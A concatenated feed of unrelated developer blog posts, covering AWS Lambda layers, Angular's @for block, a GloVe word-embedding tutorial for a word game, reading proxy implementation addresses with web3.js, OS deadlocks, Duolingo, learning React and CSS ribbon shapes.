Lambda layers can cause a particular nasty bug and it stems from how Lambda creates a filesystem from your deployment artifacts. If you've followed this blog, you know that [zip archives themselves](https://aaronstuyvenberg.com/posts/impossible-assumptions) can already create interesting edge cases when unpacking a zip file onto a file system, and Lambda is not immune to that. When a Lambda function sandbox is created, the main function package is copied into the sandbox and then each layer is copied [in order](https://docs.aws.amazon.com/lambda/latest/dg/adding-layers.html) into the same filesystem directory. This means that layers containing files with the same path and filename are squashed.
Although Lambda handler code is copied into a different directory than layer code, the runtime will decide where to look *first* for dependencies. This is typically handled by the order of directories listed in the `PATH` environment variable, or the runtime-specific variant like `NODE_PATH`, Ruby's `GEM_PATH`, or Java's `CLASS_PATH` as [documented here](https://docs.aws.amazon.com/lambda/latest/dg/packaging-layers.html).
Consider a Lambda function and two layers which all depend on different versions of the same library. Layers don't provide lockfiles or content metadata, so as a developer you may not be aware of this dependency conflict at build time or deployment time.

At runtime, the layer code and function code are copied to their respective directories, but when the handler begins processing a request; it crashes with a syntax error! But your code ran fine locally?! What happened?
The code and dependencies in the Lambda layer expect to have access to version 2 of library ABC, but the runtime has already loaded version 1 of library ABC from the function zip file!

If this seems farfetched, it can happen to you – because it [happened to me](https://github.com/DataDog/serverless-plugin-datadog/issues/321#issuecomment-1349044506).
## What Lambda layers can do for you
### Lambda layers _can_ improve function deployment speeds (but so can your CI pipeline)
Consider two Lambda functions of identical dependencies, one with using layers (A), and one without (B).
It's true that you can expect relatively shorter deployments for A, if you aren't also modifying and deploying the associated layer(s). However the vast majority of CI/CD pipelines support dependency caching, so most users have clear paths towards fast deployments regardless of their use of layers. Yes, your CloudFormation deployment will be a bit longer but ultimately there is not a distinct advantage here.
### Lambda layers can share code across functions
Within the same region, one layer can be used across different Lambda functions. This admittedly can be super useful to share libraries for authentication or other cross-functional dependencies. This is especially useful if you (like me) need to [share layers](https://github.com/datadog/datadog-lambda-extension) for other users, even publicly.
I don't really agree with the other two points in the [documentation](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html). Layers may "separate core function logic from dependencies", but only as much as putting that dependency in another file and `import`ing it. Your runtime does this already so this point falls a bit flat.
Finally, I don't think it's best to edit your production Lambda function code live in the console editor, and I _especially_ don't think you should modify your software development process to support this. (Cloud9 IDE is a good product, just don't use the version in the Lambda console.)
## Where you should use Lambda layers
Lambda layers aren't all bad, they're a tool with some sharp edges (which AWS should fix!). There are a couple exceptions which you can and should use Lambda layers.
- Shared binaries
If you have a commonly used binary like `ffmpeg` or `sharp`, it may be easier to compile those projects once and deploy them as a layer. It's handy to share them across functions, and this specific layer will rarely need to be rebuilt and updated. Layers are best with established binaries containing solid API contracts, so you won't need to deal with the deployment difficulties I listed earlier pertaining to major version upgrades.
- Custom runtimes
The immensely popular [Bref](https://bref.sh/docs/runtimes#aws-lambda-layers) PHP runtime is available as a Layer. Bref is available precompiled for both arm and x86, so it can make sense to use as a layer. The same is true for the [Bun](https://bun.sh) javascript runtime. That being said - container images have become [far more performant](https://twitter.com/astuyve/status/1715789135804354734) recently and are worth reconsidering, but that's a subject for another post.
- Lambda Extensions
Extensions are a special type of Layer but have access to extra lifecycle events, async work, and post processing which regular Lambda handlers cannot access. Extensions can perform work asynchronously from the main handler function, and can execute code _after_ the handler has returned a result to the caller. This makes Lambda Extensions a worthwhile exception to the above risks, especially if they are also pre-compiled, statically linked binary executables which won't suffer from dependency collisions.
## Wrapping up
In specific cases it can be worthwhile to use Lambda layers. Specifically for Lambda extensions, or heavy compiled binaries. However Lambda layers should not replace the runtime-specific packaging and ecosystem you already have. Layers don't offer semantic versioning, make breaking changes difficult to synchronize, cause headaches during development, and leave your software susceptible to dependency collisions.
If or when AWS offered semantic versioning, support for layer lockfiles, and integration with native package managers, I'll happily reconsider these thoughts.
Use your package manager wherever you can, it's a more capable tool and already solves these issues for you.
If you like this type of content please subscribe to my [blog](https://aaronstuyvenberg.com) or reach out on [twitter](https://twitter.com/astuyve) with any questions. You can also ask me questions directly if I'm [streaming on Twitch](twitch.tv/aj_stuyvenberg) or [YouTube](https://www.youtube.com/channel/UCsWwWCit5Y_dqRxEFizYulw). | astuyve |
1,673,201 | Day 21 OOPS | I spent the day studying OOPS. | 0 | 2023-11-21T06:29:09 | https://dev.to/harshaart/day-21-oops-95e | I spent the day studying OOPS. | harshaart | |
1,660,923 | Angular @for | Angular has released the new '@IF' block syntax similar to Javascript How does this... | 0 | 2023-11-08T17:30:28 | https://dev.to/dionisd/angular-for-ad4 | angular, angular17, typescript | ## Angular has released the new '@IF' block syntax similar to Javascript
How does this work?
`@For`
> Similar to JavaScript’s `for...of` loops, Angular provides the `@for` block for rendering repeated elements.


You might've noticed that there's additional `track` keyword.
`track` property
_Why?_
> Angular needs to track each element through any reordering, usually by treating a property of the item as a unique identifier or key (Items can later change or move).

[Angular docs](https://angular.dev/essentials/conditionals-and-loops) | dionisd |
1,660,932 | i am facing an error while integrating mongoose with elysia | error looks like this : MongooseServerSelectionError: 1 | (function (...args) { super(...args); })... | 0 | 2023-11-08T17:49:53 | https://dev.to/jayakantharun/i-am-facing-an-error-while-integrating-mongoose-with-elysia-3oj4 | bunjs, elysia | error looks like this :
MongooseServerSelectionError:
1 | (function (...args) { super(...args); }) ^ MongooseServerSelectionError: Failed to connect code: "undefined" at new MongooseError (:1:32) at new MongooseServerSelectionError (:1:32) at _handleConnectionErrors (/home/jka_583/Projects/bun_project_1/backend/node_modules/mongoose/lib/connection.js:805:10) at /home/jka_583/Projects/bun_project_1/backend/node_modules/mongoose/lib/connection.js:780:10 at processTicksAndRejections (:61:76)
find a solution to this issue..... | jayakantharun |
1,661,046 | Cracking the Code: Understanding and Developing the NLP Core of Contexto.me Using GloVe Technique | What is contexto.me game? Contexto.me game play Contexto.me is a compelling linguistic... | 0 | 2023-11-08T21:21:58 | https://dev.to/estevesegura/cracking-the-code-understanding-and-developing-the-nlp-core-of-contextome-using-glove-technique-40oi | ## What is contexto.me game?

Contexto.me game play **Contexto.me** is a compelling linguistic game, taking inspiration from **Semantle.com**, that harnesses the power of semantic distances in language. The objective is simple yet captivating: **players must discern a hidden word, with the game providing feedback on the ‘distance’ between the words the players input and the target answer.**
This ‘distance’ refers not to any physical measurement, **but to the semantic gap between words, as determined by their use and relatedness in natural language.**
## How Machines Learn the Semantic Distance Between Words: A Simple Explanation
Imagine teaching a computer to understand language like we do. To make this possible, the computer needs to see words not as individual letters or sounds, but as points in a vast space based on their meanings and uses. **This is what we call ‘semantic distance’: words used similarly are closer**, unrelated words are farther apart.
**First, the machine scans a massive amount of text**. It’s like a detective,** noticing how often and where each word appears**. This part of the process will be beautifully shown in our animation.
Next, the machine starts placing these words in the ‘semantic space’.** At first, words are scattered randomly. As the machine learns from the text, it moves similar words closer together**. This is like a dance of words settling into their right places, which our animation will also illustrate.
The magic behind all this? A technique called **GloVe (Global Vectors for Word Representation)**. GloVe observes how words interact and uses this to create the semantic space. This is how **Contexto.me can tell you how ‘close’ your word is to the target word**, making each game a journey through language.

## Transforming Words into Vectors: Mathematical Operations Made Possible
_Wait are you telling me that I can add words? or multiply words? …. Yes_
One of the fascinating aspects of converting words into vectors, or numerical representations, **is that we can perform mathematical operations on them, much like we would with traditional numbers**. Let’s explore this using familiar examples.
Consider the words **‘woman’** and **‘crown’**. In our semantic space, each word is represented as a vector — a point with a specific direction. **When we add the vectors for ‘woman’ and ‘crown’, the result aligns closely with the vector for ‘queen’**. This is because, in our language usage, the combination of a ‘woman’ with a ‘crown’ often relates to the concept of a ‘queen’.
Taking it one step further, **if we add ‘queen’ and ‘land’, we move towards the vector for ‘kingdom’**. This is because a **‘queen’** associated with **‘land’** frequently signifies a **‘kingdom’**.

In **Contexto.me**, these concepts form the foundation for gameplay. **The primary operation it performs isn’t addition, but distance calculation**. It assesses the **‘distance’ or difference** between the vector for the player’s input word and the target word. By understanding these distances, players can navigate the semantic space, using their linguistic knowledge and insights to reach the target word.

## The Magic of GloVe: A Friendly Guide to Understanding Its Python Implementation
The Python script shared here illustrates how the **GloVe (Global Vectors for Word Representation)** technique can be implemented. Let’s dissect it into key parts to understand the entire process better.
```python
import os
import numpy as np
from scipy.sparse import lil_matrix
from sklearn.preprocessing import normalize
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity
```
The script begins by importing the necessary Python libraries. These include ‘os’ for handling file paths, **‘numpy’** for numerical operations, ‘lil_matrix’ from ‘**scipy.sparse’** for creating a matrix, **‘TruncatedSVD’** from **‘sklearn.decomposition’** for singular value decomposition (SVD), and ‘cosine_similarity’ from **‘sklearn.metrics.pairwise’** to calculate the similarity between word vectors.
```python
def create_co_occurrence_matrix(corpus, window_size=4):
```
This function constructs a **co-occurrence matrix**, which is essential in GloVe. It records how often each word (row) occurs with every other word (column). The **‘window_size’** parameter sets the number of words to the left and right of a given word considered as its context.
```python
def perform_svd(matrix, n_components=300):
```
This function applies **Singular Value Decomposition (SVD)** on the co-occurrence matrix to reduce its dimensionality while preserving its most important semantic features. The **‘n_components’** parameter sets the number of dimensions for the output vectors.
```python
def create_word_embeddings(corpus):
```
**This function calls the previous two functions to create the word embeddings**. It generates the co-occurrence matrix and then applies **SVD** to create the final word vectors or **‘embeddings’**.
```python
def get_word_similarity(embeddings, word2id, word1, word2):
```
**Lastly, this function calculates the cosine similarity between any two word vectors.** It provides a measure of how semantically similar the words are, with 1 representing identical words and 0 indicating no semantic similarity.
```python
similarity = get_word_similarity(embeddings, word2id, 'sun', 'sky')
print(f"The distance between the two words is: {similarity}")
# The distance between the two words is: 0.9828447113750172
```
Finally, the script calculates and prints the semantic distance between **‘sun’** and **‘sky’**, giving a glimpse of how Contexto.me uses this kind of calculation in its gameplay.
## Full implementation of the code
```python
# Import the necessary libraries:
import os # For reading files and managing paths
import numpy as np # For performing mathematical operations
from scipy.sparse import lil_matrix # For handling sparse matrices
from sklearn.decomposition import TruncatedSVD # For Singular Value Decomposition (SVD)
from sklearn.metrics.pairwise import cosine_similarity # For calculating cosine similarity between vectors
# Define the path to the corpus folder and obtain the list of text files
corpus_folder = "./corpus"
file_names = [f for f in os.listdir(corpus_folder) if f.endswith(".txt")]
# Initialize an empty list to store the words from the corpus
corpus = []
# Read each text file in the corpus folder and append the words to the corpus list
for file_name in file_names:
file_path = os.path.join(corpus_folder, file_name)
with open(file_path, "r") as corpusFile:
for linea in corpusFile:
word_line = linea.strip().split()
corpus.extend(word_line)
# Function to create a co-occurrence matrix from the corpus with a given window size
def create_co_occurrence_matrix(corpus, window_size=4):
vocab = set(corpus) # Create a set of unique words in the corpus
word2id = {word: i for i, word in enumerate(vocab)} # Create a word-to-index dictionary for the words
id2word = {i: word for i, word in enumerate(vocab)} # Create an index-to-word dictionary for the words
matrix = lil_matrix((len(vocab), len(vocab))) # Initialize an empty sparse matrix of size len(vocab) x len(vocab)
# Iterate through the corpus to fill the co-occurrence matrix
for i in range(len(corpus)):
for j in range(max(0, i - window_size), min(len(corpus), i + window_size)):
if i != j:
matrix[word2id[corpus[i]], word2id[corpus[j]]] += 1
return matrix, word2id, id2word
# Function to perform SVD on the co-occurrence matrix and reduce the dimensionality
def perform_svd(matrix, n_components=300):
n_components = min(n_components, matrix.shape[1] - 1)
svd = TruncatedSVD(n_components=n_components)
return svd.fit_transform(matrix)
# Function to create word embeddings from the corpus using the co-occurrence matrix and SVD
def create_word_embeddings(corpus):
matrix, word2id, id2word = create_co_occurrence_matrix(corpus) # Create the co-occurrence matrix
word_embeddings = perform_svd(matrix) # Perform SVD on the matrix
return word_embeddings, word2id, id2word
# Create the word embeddings from the given corpus
embeddings, word2id, id2word = create_word_embeddings(corpus)
# Function to calculate the cosine similarity between two word vectors
def get_word_similarity(embeddings, word2id, word1, word2):
word1_vector = embeddings[word2id[word1]] # Get the vector representation of word1
word2_vector = embeddings[word2id[word2]] # Get the vector representation of word2
# Compute the cosine similarity between the two vectors
similarity = cosine_similarity(word1_vector.reshape(1, -1), word2_vector.reshape(1, -1))
return similarity[0][0]
# Example usage: Calculate the similarity between the word embeddings for 'sun' and 'sky'
similarity = get_word_similarity(embeddings, word2id, 'sun', 'sky')
print(f"The distance between the two words is: {similarity}")
```
You don’t want to run the code on your machine, do it in [Google Colab](https://colab.research.google.com/drive/10LSwy6VdgljHRZW-kGaZ5az9dbxwnwjH?usp=sharing&source=post_page-----f759a4b778d0--------------------------------).
You can also clone it from [github](https://github.com/EsteveSegura/GloVe-implementation?source=post_page-----f759a4b778d0--------------------------------) (with corpus included).
## The Importance of Corpus in GloVe Technique
The lifeblood of any **Natural Language Processing (NLP) technique**, including **GloVe**, is a **‘corpus’**. A corpus is a large and structured set of texts that the algorithm learns from. Just as humans learn language by reading, listening, and understanding context, machines need a corpus to learn the semantic relationships between words.
In the realm of GloVe, the corpus plays a pivotal role. The algorithm scrutinizes the corpus to determine how often each pair of words co-occurs within a certain context window. From this, GloVe constructs a co-occurrence matrix that serves as the foundation for generating word vectors. **Essentially, the quality and diversity of the corpus directly influence the ability of GloVe to capture and quantify semantic meanings accurately.**
**Where can you find corpora for your own NLP projects? Fortunately, numerous resources are available online. Here are a few:**
1. [Project Gutenberg](https://www.gutenberg.org/): Offers over 60,000 free eBooks, primarily from the public domain. It’s an excellent resource for historical and classic texts.
2. [Wikipedia dump](https://www.sketchengine.eu/english-wikipedia-corpus/): The entire text of English Wikipedia is available for download, providing a vast and diverse language resource.
3. [The Brown Corpus](https://www.sketchengine.eu/brown-corpus/): Compiled at Brown University, this corpus contains 500 samples of English-language text, totaling roughly one million words.
4. [The Reuters Corpus](https://trec.nist.gov/data/reuters/reuters.html): Contains 10,788 news documents totaling 1.3 million words. It’s specifically useful for applications like news article classification.
5. [Common Crawl](https://commoncrawl.org/): An open repository of web crawl data that can be accessed and analyzed by everyone.
## One last detail to understand GloVe
**A larger, diverse corpus leads to more accurate results in word similarity and semantic distance measurements**. This is due to the wider range of word contexts it provides for the learning algorithm. Hence, a substantial corpus is essential for optimal outcomes. | estevesegura | |
1,661,293 | Retrieving Implementation Contract Addresses from Proxy Contracts in EVM Networks | Proxy patterns, such as Transparent and UUPS (Universal Upgradeable Proxy Standard), are critical in... | 0 | 2023-11-09T02:07:46 | https://dev.to/mister_g/retrieving-implementation-contract-addresses-from-proxy-contracts-in-evm-networks-38fm | solidity, web3, javascript, webdev | Proxy patterns, such as Transparent and UUPS (Universal Upgradeable Proxy Standard), are critical in the upgradeable design of smart contracts. However, discerning the implementation contract address from a proxy through block explorers can be challenging. This article aims to instruct developers on extracting this information using JavaScript and web3.js, enhancing the integration of Web 2.0 with smart contracts.
Proxy contracts serve as an intermediary, delegating operations to implementation contracts, which contain the executable logic. This delegation facilitates the upgradeability of contracts without altering the deployed address. Think about a proxy, a controller, where you can change the logic in an API service but don’t need to change the endpoint or how to call the method. The implementation can be related to a service class. It holds the logic and can be updated if needed.
Patterns: Transparent proxies separate the proxy administration and logic concerns, allowing different addresses for admin and logic operations. In contrast, UUPS proxies embed the upgrade logic within the implementation contract itself, offering a more gas-efficient and elegant upgrade mechanism. Also, Transparent proxies have a separate Admin contract responsible for Access Control, Upgrades, and Ownership control.

Block Explorer showing the current implementation contract address
Limitations of Block Explorers: Block explorers can show the current implementation address, but in some cases, these addresses can be different from the registered on-chain. If you deploy a new implementation contract, it will take a few minutes for the Block Explorer to update this information. If any error occurs, this information will not be trustworthy.
Extracting the Address from the blockchain: To circumvent this limitation, developers can employ web3.js to interact with the Ethereum blockchain and programmatically determine the implementation contract’s address. The UUSP and Transparent Proxy patterns should follow the EIP-1967, which sets a specific storage slot to hold the implementation contract address. Based on this information, you can use the code below to extract the current address.
```
import Web3 from 'web3';
const web3 = new Web3("https://polygon-testnet.public.blastapi.io/");
const implementationStorage = await web3.eth.getStorageAt(proxyAddress, "0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc");
if (implementationStorage === "0x0000000000000000000000000000000000000000000000000000000000000000") return null;
const implementationAddressHex = "0x" + implementationStorage.slice(-40); // Extract the last 40 characters (20 bytes) from the storage content
const currentImplementationAddress = web3.utils.toChecksumAddress(implementationAddressHex); // Validate the address
console.log("Found current Implementation contract address", currentImplementationAddress);
```
For the Transparent pattern, you can also get the Proxy Admin contract using the code below:
```
import Web3 from 'web3';
const web3 = new Web3("https://polygon-testnet.public.blastapi.io/");
const implementationProxyAdminStorageContentTransparent = await web3.eth.getStorageAt(proxyAddress, "0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103");
if (implementationProxyAdminStorageContentTransparent !== "0x0000000000000000000000000000000000000000000000000000000000000000") {
const implementationAddressProxyAdminHexTransparent = "0x" + implementationProxyAdminStorageContentTransparent.slice(-40);
_proxyInfo.currentProxyAdminAddress = web3.utils.toChecksumAddress(implementationAddressProxyAdminHexTransparent); // Validate the address
console.log("Found Proxy Admin contract address in Transparent pattern", _proxyInfo.currentImplementationAddress);
}
```
Remember to initialize Web3 with your own RPC before using it.
If you are a Web 2.0 developer, this code will provide a more assertive way to know the current implementation contract and how to interact with it if needed.
To help you read, change, test, and deploy contracts. Check out my project: [DevWeb3.co](https://devweb3.co) | mister_g |
1,661,373 | Unlocking the Power of Open Source: How to Get Involved and Why It Matters | Open source is the pulse of the modern software ecosystem. From tiny libraries to operating system... | 0 | 2023-11-09T05:17:33 | https://dev.to/opensign/unlocking-the-power-of-open-source-how-to-get-involved-and-why-it-matters-2b68 | webdev, javascript, beginners, opensource | Open source is the pulse of the modern software ecosystem. From tiny libraries to operating system behemoths, open-source projects drive innovation and keep the digital world spinning. If you're a developer who hasn't yet plunged into the open-source pool, you're missing out on an ocean of opportunities. In this post, we'll explore why contributing to open-source is a game-changer for your career, your skills, and the tech community.
## Why Contribute to Open Source?
**Career Advancement:** Open-source contribution is a sparkling gem on your resume. It signals to employers that you are collaborative, proactive, and passionate about your work.
**Skill Enhancement:** Working on open-source projects exposes you to the best coding practices and new technologies. It's a practical, fast-tracked learning experience.
**Community and Networking:** The open-source community is a tech nexus. You'll connect with like-minded individuals, mentors, and industry leaders.
**Philanthropy with Code:** Contributing to open-source is giving back. Your code could help non-profits, global enterprises, and everything in between.
## How to Start Contributing
1. **Choose a Project:** Start with something that piques your interest or uses a technology stack you're familiar with.
2. **Understand the Contribution Guidelines:** Every project has its own set of rules for contribution. Respect the process and communicate clearly.
3. **Start Small:** Look for 'good first issue' tags in project repositories. These are welcoming first steps for newcomers.
4. **Submit a Pull Request (PR):** Once you've made your changes, submit a PR. Make sure your code aligns with the project's style and contribution guidelines.
5. **Engage in the Discussion:** Maintainers may suggest changes. Stay responsive, open to suggestions, and ready to make improvements.
## Your First Contribution: A Guided Example
Let's say you're interested in web development and want to contribute to a project that's making a difference. [OpenSign](https://github.com/opensignlabs/opensign), an open-source document e-signing platform, could be a great start. Here’s how you can contribute:
1. **Familiarize with OpenSign:** Check out its GitHub repo, understand its documentation, and set it up on your local machine.
2. **Find an Issue:** Look for open issues tagged with "help wanted" or "good first issue."
3. **Communicate:** Post a comment expressing your wish to tackle the issue. Maintainers appreciate a heads-up.
4. **Fix the Issue:** Write your code, keeping in line with OpenSign’s practices.
5. **Pull Request:** Submit your PR with a clear description of your changes and any other comments that can help maintainers review your contribution.
## The Ripple Effect of Your Contribution
By contributing to open-source projects like OpenSign, you're not just writing code—you're supporting privacy, security, and innovation in digital document handling. Each contribution is a building block in a technology that could empower businesses, protect individual rights, and foster trust in digital transactions.
## Take the Leap
Don't let another day go by without contributing to open source. Dive into the code, and you'll emerge a better developer and collaborator. Remember, open source is more than just coding—it's an adventure in continuous learning and community building.
Ready to start your open-source journey? Visit [OpenSign](https://github.com/opensignlabs/opensign) on GitHub and see where your skills can take the project. Whether it's improving documentation, designing UI/UX, or enhancing security features, your code could make the next big impact.
Happy coding, and we can't wait to see the contributions you'll make!
{% cta https://github.com/opensignlabs/opensign %} ⭐ OpenSign on GitHub{% endcta %}
| alexopensource |
1,661,398 | Deadlock in Operating System | Introduction Deadlock is a critical problem in programs and operating systems. It happens... | 24,699 | 2023-11-09T05:36:18 | https://dev.to/syedmuhammadaliraza/deadlock-in-operating-system-30e2 | computerscience, softwareengineering, operatingsystem, deadlock | # Introduction
Deadlock is a critical problem in programs and operating systems. It happens when two or more processes or threads cannot continue because they are waiting for each other to release a resource. In this article, we will explore the concept of deadlock, its causes, prevention strategies, and various resolution algorithms with code examples.
## What is Deadlock?
This is best understood through a simple analogy - imagine two people trying to pass each other in a narrow corridor. If both people are rude and refuse to step in, they will be in a state of "lockdown" because they cannot move forward without cooperation.
In computer science, deadlocks occur when a process or class cannot continue because it is waiting for shared resources. This can cause the system to be unresponsive or sluggish.
## Causes of Deadlock
Lockouts can occur for a variety of reasons, but are often associated with the following four conditions, known as the "Four Prerequisites for Lockouts":
1. **Mutual Exclusion**: At least one resource must be stored in a non-shared format. This means that only one process or thread can be accessed at a time.
2. **Hold and Wait**: You must save at least one resource while waiting to receive additional resources.
3. **No Preemption**: Resources cannot be obtained by force. It can only be released voluntarily.
4. **Circular Wait**: Each process must be a circular chain of processes waiting for resources to be held by the next process in the chain.
To avoid conflicts, you must ensure that at least one of these conditions is not met.
## Deadlock Prevention
Deadlock Prevention aims to eliminate one or more of the four prerequisites for a lock. Here are some strategies:
1. **Resource Allocation Graph**: Maintain a graph showing resource allocation and operational demand. If the graph does not have a loop, then it does not have a loop. If there is a cycle, identify it and use the resources.
2. **Resource Allocation Table**: Use the table to track the status of each resource, whether it is available, allocated, or requested by the process. This information helps in resource allocation decisions.
3. **Resource Allocation Policy**: Implement a resource allocation policy that prevents constraints. For example, the Banker algorithm ensures that resource allocation is not blocked.
## Deadlock Resolution Algorithms
A deadlock resolution algorithm is used to escape the deadlock when the prevention strategy fails. Here are the most commonly used nesting algorithms:
### 1. Kill one or more processes
In this strategy, one or more processes are terminated to break the deadlock. The process to be carried out is selected based on certain criteria (for example, priority or resource use).
```Python
Cheat code to kill the process to resolve the lock
def kill_process(process):
process.terminate()
```
### 2.Resource Preemption
Resource redundancy refers to taking resources from one or more processes to solve problems. An option can be either standard (resources taken by force) or non-standard (resources taken by voluntary release).
```Python
Pseudo code to prevent the source from resolving the key
def preempt_resource(resource, action):
process.release_resource(resource)
resource.allocate_to(function)
```
## Example type
### Example 1: Dining Philosophers Problem
The Philosophers' Dinner problem is a classic example of a blocked scenario in a concurrent program. It includes a group of philosophers sitting at a round table and eating with chopsticks. Philosophers need two chopsticks to eat, but there are not enough chopsticks for everyone, leading to a gridlock situation.
```Python
class philosopher:
def __init __ ( self , name , left_shepherd , right_shepherd ):
self.name = name
self.left_chopstick = left_chopstick
self.right_chopstick = right_chopstick
def eat ( self ):
self.left_chopstick.acquire()
self.right_chopstick.acquire()
# Eat
self.left_chopstick.release()
self.right_chopstick.release()
philosopher = [Philosopher("P1", print1, print2), ...]
```
### Example 2: Banker Algorithm
The banker's algorithm is a key prevention strategy that distributes funds in a way that ensures safe execution of transactions. If resource allocation cannot be made reliably, the system rejects the request, preventing blocking.
```Python
def request_resource(process, resource, request):
if request <= resource.available:
if request <= resource.max - resource.allocated[process]:
resource.available -= request
resource.allocated[process] += request
return "Resource granted."
else:
return "Resource request exceeds maximum claim."
else:
return "Resource not available. Process must wait.
```
| syedmuhammadaliraza |
1,661,544 | Is Duolingo the right tool for learning? | I'd been using Duolingo for learning German for 1-2 months. Was it the right tool for learning new... | 0 | 2023-11-09T08:42:01 | https://dev.to/apetryla/is-duolingo-the-right-tool-for-learning-53aj | learning, discuss, productivity, career | I'd been using Duolingo for learning German for 1-2 months. Was it the right tool for learning new language? Not for me!
Duolingo doesn't take advantage of spaced repetition. I got sick and tired of successfully answering the same word for 15 lessons and then not seeing that word ever again. In total I did 2.5 units, so there was plenty of space for spaced repetition.
Overly gamified. When I do my first lessons of a day, there are so many "achievements" that they distract my focus and learning. Maybe the development could be focused better on the quality of learning instead of throwing tons of fake achievements?
I'm not a native English speaker. So I often ended up writing the longest sentence in English translation and have it marked as "false" just because of forgotten "the". Good job, Duo! You spot me...
The UI is also too primitive. For example, when I need to make a sentence out of multiple separate words provided in flashcards, I can't change the order of the words. I can only add the word to the end of the sentence, but not insert it. This again often results in having to rewrite the whole sentence, when the missing word is in the beginning of the sentence.
The overall feeling of the learning felt slow and boring. In the first weeks I was excited, because I was learning the new language. However, later when I was opening Duolingo, I felt more and more like it was a boring bureaucratic process that I have to go through. Why? Too many lessons of the same topic, too much repetition, too slow. I felt that throwing away 2/3 of the content would result in a 3 times better app.
So while this may be a tool for learning a new language, I consider it a really non efficient, non structured way of learning, having poor UX. I dumped Duolingo ~1 month ago changing my learning strategy. Now I feel more satisfied with my new learning process and feel that I'm improving faster.
What's Your experience learning languages? Have You used Duolingo? | apetryla |
1,661,775 | The only thing you need to master React! (from my 5 years of experience) | I've been working in and around React since the time it got popular. I've dug in every corner of it,... | 0 | 2023-11-11T14:52:32 | https://dev.to/goodgit/the-only-thing-you-need-to-master-react-from-my-5-years-of-experience-1i6o | react, webdev, javascript, programming | I've been working in and around React since the time it got popular. I've dug in every corner of it, from reading the source code to creating my own libraries to simplify the mess React can create at times.
But this was all possible because of one thing I did, and even to this date, I continue to do it when I want to learn something at its core in the least time possible.
**Create your own (mini) version of it.**
### whY?
React, at its core, is just a way to write HTML using JS. Why JS? Because it's a scripting language and you can write logic in it, while HTML is a declarative language and you can simply declare everything you want.
React combines the two. You can declare with logic, empowering everything. That's it. That's all the React ever was, is, and will be.
### What to do?
I get it. The first thought of creating your own mini-version of React can seem both exciting and heart-pounding at the same time. Just like talking to your crush. But here, we will learn all about masterful flirting, i.e. how to masterfully create your own version of React.
### Steps:
1. Let's stop calling it "your version of React.".
Let's call it "GoodAct".
2. Second, this is where you come in. I am not going to give you any code because reading my code won't make you "master" react. You will have to open up VS Code and write your own code. I, however, will do one thing for you. If you write your code, share the github repo with me. I'd give it a try and feature some good ones in an article. Also, shoot me any questions or if you're stuck somewhere. Let's get you resolved.
My email is shubham@goodgit.io
### Basics to understand
To keep things simple, let's not use JSX. It's basically a really complex version of "replace". as in, replace this tag with this code all the way down to HTML.
```jsx
<Blog title="Hello World" image="/static/image.png">
```
is replaced to
```html
<div class="blog">
<h1>Hello World</h1>
<image src="/static/image.png" />
</div>
```
### What to build?
2 things. Virtual DOM and state That's it.
To keep things simple and core, all will be there in one HTML file only. The following weird-looking syntax should be understood by goodact:
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
<h1>{{ title }}</h1>
<p>{{ body }}</p>
<script src="goodact.js"></script>
</body>
</html>
```
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
<input type="number" value="{{ userN }}"/>
<h1>Your number times 2 is {{ userN * 2}}</h1>
<script src="goodact.js"></script>
</body>
</html>
```
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
{% for i in range(10) %}
<h1>Let's count {{ i }}. </h1>
{% endfor %}
<script src="goodact.js"></script>
</body>
</html>
```
That's it. 😂 I know, I know. it's crazy. but I also know you can do it. It's not easy but it is going to ramp up all the muscles in your brain, but by the end of it, you'll be smarter, sharper and amaster.😉
start on a weekend. Think about how you can build something like this. For those of you familiar with Django or Flask, it will feel a lot of jinja-templating, and you're correct; that's where I drew my inspiration from.
Once you can build a system like this, you'll know exactly how React works under the hood, and you will have a newfound appreciation for the tool you are so used to using.
See you on the other side with your projects working. Shoot me an email if you need any help, just want to talk, or are excited to share what you built!
### Also, also, also
Use GoodGit to push your code to GitHub.
Just install it with
```bash
pip install goodgit
```
and then
```bash
gg add.
```
GoodGit takes care of the rest. You don't even have to write a commit message. Just go and use it. You can read about it at https://goodgit.io. | brainspoof |
1,662,292 | I have made 100+ CSS-only Ribbon Shapes | The Perfect Collection 🎀 | It's time for another collection! After the loaders, the hover effects, and the background patterns,... | 0 | 2023-11-13T10:37:12 | https://dev.to/afif/i-have-made-100-css-only-ribbon-shapes-the-perfect-collection-4374 | css, webdev, beginners, showdev | It's time for another collection! After [the loaders](https://dev.to/afif/css-loaderscom-the-biggest-collection-of-loading-animations-more-than-500--23jg), [the hover effects](https://dev.to/afif/100-underline-overlay-animation-the-ultimate-css-collection-4p40), and [the background patterns](https://dev.to/afif/i-created-100-unique-css-patterns-the-best-collection-31cl), let's make some Ribbon Shapes!
----
## <center> 👉 [CSS Ribbon Shapes](https://css-generators.com/ribbon-shapes/) 👈 </center>
----
More than 100 CSS-only Ribbon Shapes that are made using a **single element**. Yes, only one element per shape (even the most complex ones).
Stop looking at CSS Ribbons made with old and obsolete code. Mine are made with modern CSS and optimized with CSS variables. There are no magic numbers or fixed dimensions. All the shapes fit whatever content you put inside them and you can easily control them by adjusting a few variables.
What are you waiting for? All it takes is one click to copy the CSS of any ribbon shape.
---
You will find the classic ribbons but a lot of new and fancy ones. I won't detail all of them but here are some of my favorites.
### The Multi-line Ribbons
Probably the ones I like the most. It was a bit challenging to create a repeating shape that fit multi-line text. In the end, The final result is satisfying.

Here are two interactive demos where you can edit the text and see how the shape adjusts to fit the content.
{% codepen https://codepen.io/t_afif/pen/ZEwOZVB %}
{% codepen https://codepen.io/t_afif/pen/BaMRQor %}
### The Curved Ribbons
It wasn't easy to combine straight text with a curved shape but I found a few interesting ideas

## The Infinite Ribbons
A Ribbon that never ends? why not! You will find a few of them that extend to the edge of the screen in any direction you want (top, bottom, right, left).

They are built without pseudo-elements and won't create any overflow issues. Here are two demos to illustrate some of them (best viewed at full screen)
{% codepen https://codepen.io/t_afif/pen/NWoRJMy %}
{% codepen https://codepen.io/t_afif/pen/rNqJYrZ %}
---
What about you? Which one do you like? 👇
You can get a unique link for each ribbon. If you like the `#54` then the link is: https://css-generators.com/ribbon-shapes/#r54
You can easily share your favorite Ribbon Shape!
---
